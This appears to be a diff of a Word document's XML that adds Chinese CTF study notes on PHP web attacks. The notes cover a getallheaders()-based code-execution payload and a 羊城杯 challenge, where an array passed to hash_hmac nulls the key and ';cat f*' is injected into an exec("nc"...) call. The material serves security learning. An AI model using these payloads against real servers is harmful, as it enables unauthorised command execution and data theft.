+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>当确定能够返回时，我们就能在数据包最后一行加上一个请求头，写入恶意代码，再用end()函数指向最后一个请求头，使其执行</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload：var_dump(end(getallheaders()));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>然后在数据包里随便家的请求头里面放phpinfo或者其他函数</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -466,7 +1386,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
+                    <a:blip r:embed="rId6"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -990,7 +1910,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1079,7 +1999,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="6"/>
+          <w:rStyle w:val="7"/>
           <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
           <w:color w:val="auto"/>
           <w:sz w:val="21"/>
@@ -1558,6 +2478,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
+          <w:ilvl w:val="0"/>
           <w:numId w:val="0"/>
         </w:numPr>
         <w:rPr>
@@ -1580,6 +2501,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
+          <w:ilvl w:val="0"/>
           <w:numId w:val="0"/>
         </w:numPr>
         <w:rPr>
@@ -1602,6 +2524,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
+          <w:ilvl w:val="0"/>
           <w:numId w:val="0"/>
         </w:numPr>
         <w:rPr>
@@ -1610,7 +2533,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
@@ -1635,7 +2557,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId8"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1659,19 +2581,22 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
         <w:keepNext w:val="0"/>
         <w:keepLines w:val="0"/>
         <w:widowControl/>
         <w:suppressLineNumbers w:val="0"/>
+        <w:pBdr>
+          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
+        </w:pBdr>
         <w:rPr>
           <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1694,7 +2619,356 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>羊城杯例题</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    die('谁！竟敢踩我一只耳的尾巴！');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>$clandestine = getenv("clandestine");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>if(isset($_POST['White-cat-monitor']))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>if($hh !== $_POST['Black-Cat-Sheriff']){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    die('有意瞄准，无意击发，你的梦想就是你要瞄准的目标。相信自己，你就是那颗射中靶心的子弹。');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">echo exec("nc".$_POST['One-ear']); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
+          <w:ilvl w:val="0"/>
           <w:numId w:val="0"/>
         </w:numPr>
         <w:rPr>
@@ -1704,6 +2978,223 @@
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>介绍一下函数 hash_hmac($algo, $data, $key)：当传入的$data为数组时，加密得到的结果固定为NULL；我们可以让White-cat-monitor的值是一个数组，这样使得clandestine的值为null，</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>所以</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>White-cat-monitor=a[]是个数组</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>那么第四行可以看成：$hh = hash_hmac('sha256', $_POST['One-ear'], null);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>我们可以自己运行出$hh并赋值给black-cat-sheriff</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>然后我们需要把one-ear传入我们要执行的命令</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>我们先用“；”把nc过掉，直接用dir算出对应的black-cat-sheriff</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>再让one-ear=cat f*</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -1845,11 +3336,11 @@
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Code"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Definition"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Keyboard"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Preformatted"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Preformatted"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Sample"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Typewriter"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Variable"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:name="Normal Table"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:name="Normal Table"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="annotation subject"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Simple 1"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Simple 2"/>
@@ -2011,14 +3502,37 @@
       <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="5">
+  <w:style w:type="paragraph" w:styleId="2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="1"/>
+    <w:next w:val="1"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:uiPriority w:val="0"/>
+    <w:pPr>
+      <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
+      <w:jc w:val="left"/>
+    </w:pPr>
+    <w:rPr>
